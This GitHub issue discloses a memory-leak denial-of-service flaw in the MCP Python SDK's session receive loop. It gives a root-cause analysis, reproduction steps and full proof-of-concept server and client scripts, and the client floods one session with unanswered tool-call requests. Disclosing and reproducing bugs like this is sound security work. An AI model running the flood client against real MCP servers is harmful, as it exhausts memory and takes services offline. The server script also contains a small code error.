Skip to content

RequestResponder Not Cleaned Up in BaseSession _receive_loop Causing Session Memory Leak #1385

@weblover12

Description

@weblover12

Summary

Vulnerability summary

A remote Denial-of-Service (DoS) vulnerability exists in the mcp.shared.session.BaseSession receive loop due to missing session resource cleanup logic.

The receive loop creates RequestResponder objects for incoming requests and stores them in the session-level _in_flight dictionary without guaranteeing their removal, which permits unbounded accumulation of responders and uncontrolled resource consumption.

An unauthenticated remote attacker can exploit this behavior by sending many asynchronous requests within the same session, causing memory consumption growth and potential process crash or unresponsiveness.


Initial checks

Confirmed use of the latest MCP Python SDK by reporter.

Reporter confirmed prior search of repository issues (https://github.com/modelcontextprotocol/python-sdk/issues) before filing this report.


Technical details

Affected component and file path

Component: MCP Python SDK session management component.

File: mcp/shared/session.py.

Vulnerable area: the _receive_loop code path that instantiates and registers RequestResponder objects into self._in_flight.

Root cause analysis

RequestResponder implements cleanup in its context-manager exit method; removal from _in_flight occurs in that exit logic.

_receive_loop constructs and registers a RequestResponder instance but does not use it as a context manager (i.e., with responder: is not used), so exit is not invoked in normal execution.

respond() and cancel() methods do not proactively remove the responder from _in_flight; removal is only performed by the exit handler, which is not triggered in the common path.

If a handler fails to call respond() or stalls indefinitely, _in_flight entries accumulate and memory usage grows without bound, producing an Uncontrolled Resource Consumption condition (CWE-400).

Vulnerability type and mapping

CWE: CWE-400: Uncontrolled Resource Consumption.

Attack vector: Network.

Authentication: None required for triggering when session creation is permitted.


Impact

Scope of impact

A remote attacker can cause memory exhaustion and process instability by repeatedly creating requests in the same session without waiting for responses, resulting in service unavailability.

Single-session exploitation is sufficient to produce severe impact in many deployments; shared/tenant environments may experience cascading degradation.

Observed operational effects

Rapid growth of process memory usage.

Increased garbage-collection overhead and event-loop/scheduler pressure.

Potential creation of many concurrent tasks/threads depending on handler behavior, leading to broader service failure.

Suggested severity

Suggested severity: High to Critical, depending on deployment exposure, tenancy model, and existing mitigations.


Reproduction steps (Proof-of-Concept)

Preconditions

A server running a vulnerable MCP Python SDK release that uses the described _receive_loop behavior.

A Python client capable of establishing a session and sending many asynchronous requests in a single session.

Minimal reproduction steps

Start the vulnerable PoC server (or the target server running the vulnerable SDK) bound to a test address and port.

From a client, establish a single long-lived session with the server using the normal SDK handshake flow (initialize → initialized).

Rapidly send a large number of requests over the same session without awaiting responses (for example, spawn many asyncio.create_task(client.post(...)) tasks in a tight loop or use the provided PoC client with --requests set high and --rate set to a fast value).

Ensure the server-side handler either never calls respond() for those requests or intentionally holds completion indefinitely so that RequestResponder objects remain registered in self._in_flight.

Observe server metrics and internal state; confirm _in_flight grows monotonically and process RSS (memory) increases until resource exhaustion or degraded service is observed.

Example commands

# Start PoC server (adjust path/python as needed)
python standalone_server_net.py --host 127.0.0.1 --port 9999
# Run PoC client (adjust script name/flags)
python client.py --host 127.0.0.1 --port 9999 --requests 5000 --rate 0 --hold_open

Vulnerable code paths

Key snippet illustrating problematic behavior

responder = RequestResponder(... )
self._in_flight[responder.request_id] = responder  # entry added but removal not guaranteed
await self._received_request(responder)
if not responder._completed:
    await self._handle_incoming(responder)

The cleanup path that removes the responder from _in_flight exists only in the RequestResponder.exit implementation, but _receive_loop does not enter a context manager scope to trigger exit.

Empirical observation

In reported testing, a baseline process memory of approximately 2.8 GB increased by ~1 GB after roughly 4,600 rapid requests under a leaky handler scenario, demonstrating real-world impact potential.


Appendix

PoC server (standalone_server_net.py)

# (Full PoC server code excerpt — starts a TCP server, uses a 'ping' tool whose handler waits forever,
#  forwards newline-delimited JSON into the SDK session, and prints inflight size and RSS.)
# Save as standalone_server_net.py and run: python standalone_server_net.py --host 127.0.0.1 --port 9999

from __future__ import annotations
import argparse
import asyncio
import json
import logging
import resource
from typing import Any, AsyncIterator
import anyio
from mcp.server.lowlevel import Server
from mcp.server.session import ServerSession
from mcp.shared.message import SessionMessage
from mcp.shared.session import BaseSession
from mcp.types import JSONRPCMessage, Tool

logging.basicConfig(level=logging.WARNING)

class DelimitedStream:
    def __init__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter, delimiter: bytes = b'\n'):
        self._reader = reader
        self._writer = writer
        self._delimiter = delimiter
    async def __aiter__(self) -> AsyncIterator[SessionMessage | Exception]:
        while True:
            try:
                line = await self._reader.readuntil(self._delimiter)
                if not line:
                    break
                message = JSONRPCMessage.model_validate(json.loads(line))
                yield SessionMessage(message=message)
            except (asyncio.IncompleteReadError, ConnectionResetError):
                break
            except Exception as e:
                yield e
    async def send(self, message: SessionMessage) -> None:
        data = message.message.model_dump_json(by_alias=True, exclude_none=True).encode('utf-8')
        self._writer.write(data + self._delimiter)
        await self._writer.drain()
    async def aclose(self) -> None:
        self._writer.close()
        await self._writer.wait_closed()

class Streamable:
    def __init__(self, read_stream: DelimitedStream, write_stream: DelimitedStream):
        self._read_stream = read_stream
        self._write_stream = write_stream
    async def __aenter__(self):
        read_writer, read_reader = anyio.create_memory_object_stream
        write_writer, write_reader = anyio.create_memory_object_stream
        self._read_writer = read_writer
        self._write_reader = write_reader
        self._read_task = asyncio.create_task(self._forward_reads())
        self._write_task = asyncio.create_task(self._forward_writes())
        return read_reader, write_writer
    async def __aexit__(self, exc_type, exc_val, exc_tb):
        self._read_task.cancel()
        self._write_task.cancel()
        await asyncio.gather(self._read_task, self._write_task, return_exceptions=True)
        await self._read_stream.aclose()
        await self._write_stream.aclose()
    async def _forward_reads(self):
        async for msg in self._read_stream:
            await self._read_writer.send(msg)
        await self._read_writer.aclose()
    async def _forward_writes(self):
        async for msg in self._write_reader:
            await self._write_stream.send(msg)

class LeakyServer(Server):
    def __init__(self):
        super().__init__(name="leaky-server")
        self._session: BaseSession | None = None
        self._total_requests = 0
        self._log_interval = 1000
        self.call_tool()(self.handle_call_tool)
        self.list_tools()(self.handle_list_tools)
    async def _handle_request(self, message, req, session: ServerSession, lifespan_context, raise_exceptions: bool) -> None:
        self._session = session
        self._total_requests += 1
        try:
            request_id = message.request_id
        except AttributeError:
            request_id = "unknown"
        if self._total_requests <= 5 or self._total_requests % self._log_interval == 0:
            usage_kb = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
            rss_info = f"{usage_kb / 1024:.2f} MB" if usage_kb > 0 else "unknown"
            print(f"[server] received request id={request_id} total={self._total_requests} rss={rss_info}")
        await super()._handle_request(message, req, session, lifespan_context, raise_exceptions)
    async def handle_list_tools(self) -> list[Tool]:
        return [Tool(name="ping", description="A tool that never responds.", inputSchema={"type": "object", "properties": {}})]
    async def handle_call_tool(self, name: str, arguments: dict[str, Any]) -> None:
        if name == "ping":
            try:
                await asyncio.Event().wait()
            except asyncio.CancelledError:
                pass

async def run_server(host: str, port: int):
    server = LeakyServer()
    async def client_connected(reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
        stream = Streamable(DelimitedStream(reader, writer, delimiter=b'\n'), DelimitedStream(reader, writer, delimiter=b'\n'))
        async with stream as (read_stream, write_stream):
            init_options = server.create_initialization_options()
            try:
                await server.run(read_stream, write_stream, init_options)
            finally:
                server._session = None
    srv = await asyncio.start_server(client_connected, host, port)
    addr = srv.sockets[0].getsockname()
    print(f"Listening on {addr}")
    async with srv:
        try:
            while True:
                if server._session:
                    in_flight_size = len(server._session._in_flight)
                    usage_kb = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss
                    rss_info = "unknown" if usage_kb <= 0 else f"{usage_kb / 1024:.2f} MB"
                    print(f"[server] inflight={in_flight_size} total={server._total_requests} rss={rss_info}")
                await asyncio.sleep(1.0)
        except (KeyboardInterrupt, asyncio.CancelledError):
            print("Shutting down server...")
        finally:
            srv.close()
            await srv.wait_closed()

def parse_args():
    p = argparse.ArgumentParser()
    p.add_argument('--host', default='127.0.0.1')
    p.add_argument('--port', type=int, default=9999)
    return p.parse_args()

def main():
    args = parse_args()
    try:
        asyncio.run(run_server(args.host, args.port))
    except KeyboardInterrupt:
        pass

if __name__ == '__main__':
    main()

PoC client (client.py)

# (Full PoC client code excerpt — connects to server, performs session initialize/list_tools,
#  then floods the session with many 'tools/call' requests without awaiting responses.)
# Save as client.py and run as shown in Example commands.

from __future__ import annotations
import argparse
import asyncio
import json
import logging
from typing import AsyncIterator, Union
import anyio
from mcp import ClientSession
from mcp.shared.message import SessionMessage
from mcp.types import JSONRPCMessage, JSONRPCRequest

logging.basicConfig(level=logging.WARNING)

class DelimitedStream:
    def __init__(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter, delimiter: bytes = b'\n'):
        self._reader = reader
        self._writer = writer
        self._delimiter = delimiter
    async def __aiter__(self) -> AsyncIterator[Union[SessionMessage, Exception]]:
        while True:
            try:
                line = await self._reader.readuntil(self._delimiter)
                if not line:
                    break
                obj = json.loads(line.decode() if isinstance(line, (bytes, bytearray)) else line)
                message = JSONRPCMessage.model_validate(obj)
                yield SessionMessage(message=message)
            except (asyncio.IncompleteReadError, ConnectionResetError):
                break
            except Exception as e:
                yield e
    async def send(self, message: SessionMessage) -> None:
        data = message.message.model_dump_json(by_alias=True, exclude_none=True)
        if isinstance(data, str):
            data = data.encode("utf-8")
        self._writer.write(data + self._delimiter)
        await self._writer.drain()
    async def aclose(self) -> None:
        try:
            self._writer.close()
            await self._writer.wait_closed()
        except Exception:
            pass

class Streamable:
    def __init__(self, read_stream: DelimitedStream, write_stream: DelimitedStream):
        self._read_stream = read_stream
        self._write_stream = write_stream
    async def __aenter__(self):
        read_writer, read_reader = anyio.create_memory_object_stream(0)
        write_writer, write_reader = anyio.create_memory_object_stream(0)
        self._read_writer = read_writer
        self._write_reader = write_reader
        self._read_task = asyncio.create_task(self._forward_reads())
        self._write_task = asyncio.create_task(self._forward_writes())
        return read_reader, write_writer
    async def __aexit__(self, exc_type, exc_val, exc_tb):
        self._read_task.cancel()
        self._write_task.cancel()
        await asyncio.gather(self._read_task, self._write_task, return_exceptions=True)
        await self._read_stream.aclose()
        await self._write_stream.aclose()
    async def _forward_reads(self):
        async for msg in self._read_stream:
            await self._read_writer.send(msg)
        await self._read_writer.aclose()
    async def _forward_writes(self):
        async for msg in self._write_reader:
            await self._write_stream.send(msg)

async def run_client(host: str, port: int, requests: int, wait: float, rate: float, duration: float, hold_open: bool, log_interval: int) -> None:
    reader, writer = await asyncio.open_connection(host, port)
    stream = Streamable(DelimitedStream(reader, writer, delimiter=b'\n'), DelimitedStream(reader, writer, delimiter=b'\n'))
    async with stream as (read_stream, write_stream):
        async with ClientSession(read_stream, write_stream) as session:
            await session.initialize()
            await session.list_tools()
            loop = asyncio.get_running_loop()
            start_time = loop.time()
            total_sent = 0
            next_request_id = getattr(session, "_request_id", 1)
            if requests <= 0:
                print("Sending requests until interrupted...")
            else:
                print(f"Targeting {requests} requests...")
            try:
                while True:
                    if requests > 0 and total_sent >= requests:
                        break
                    if duration > 0 and (loop.time() - start_time) >= duration:
                        break
                    request = JSONRPCRequest(jsonrpc="2.0", id=next_request_id, method="tools/call", params={"name": "ping", "arguments": {}})
                    next_request_id += 1
                    total_sent += 1
                    await session._write_stream.send(SessionMessage(message=JSONRPCMessage(request)))  # type: ignore[attr-defined]
                    if log_interval > 0 and total_sent % log_interval == 0:
                        print(f"[client] sent={total_sent} last_request_id={request.id}")
                    if rate > 0:
                        await asyncio.sleep(1.0 / rate)
                    else:
                        await asyncio.sleep(0)
            except KeyboardInterrupt:
                print("Interrupted while sending requests.")
            session._request_id = next_request_id  # type: ignore[attr-defined]
            print(f"Submitted {total_sent} requests; next_request_id={next_request_id}")
            if hold_open:
                print("Holding session open. Press Ctrl+C to close the client and release the session.")
                try:
                    await asyncio.Event().wait()
                except KeyboardInterrupt:
                    pass
            elif wait > 0:
                print(f"Waiting {wait}s before closing connection...")
                await asyncio.sleep(wait)
    print("Client session closed.")

def parse_args():
    p = argparse.ArgumentParser()
    p.add_argument('--host', default='127.0.0.1')
    p.add_argument('--port', type=int, default=9999)
    p.add_argument('--requests', type=int, default=10000)
    p.add_argument('--wait', type=float, default=120.0)
    p.add_argument('--rate', type=float, default=0.0)
    p.add_argument('--duration', type=float, default=0.0)
    p.add_argument('--log-interval', type=int, default=1000)
    p.add_argument('--no-hold-open', dest='hold_open', action='store_false')
    p.set_defaults(hold_open=True)
    return p.parse_args()

def main():
    args = parse_args()
    try:
        asyncio.run(run_client(host=args.host, port=args.port, requests=args.requests, wait=args.wait, rate=args.rate, duration=args.duration, hold_open=args.hold_open, log_interval=args.log_interval))
    except KeyboardInterrupt:
        pass

if __name__ == '__main__':
    main()

Result

Image

The PoC demonstrates _in_flight growth and memory increase under rapid-request conditions against a leaky handler, observable in printed logs and process RSS metrics.

Metadata

Metadata

Assignees

No one assigned

    Labels

    P2Moderate issues affecting some users, edge cases, potentially valuable featurebugSomething isn't workingready for workEnough information for someone to start working on

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions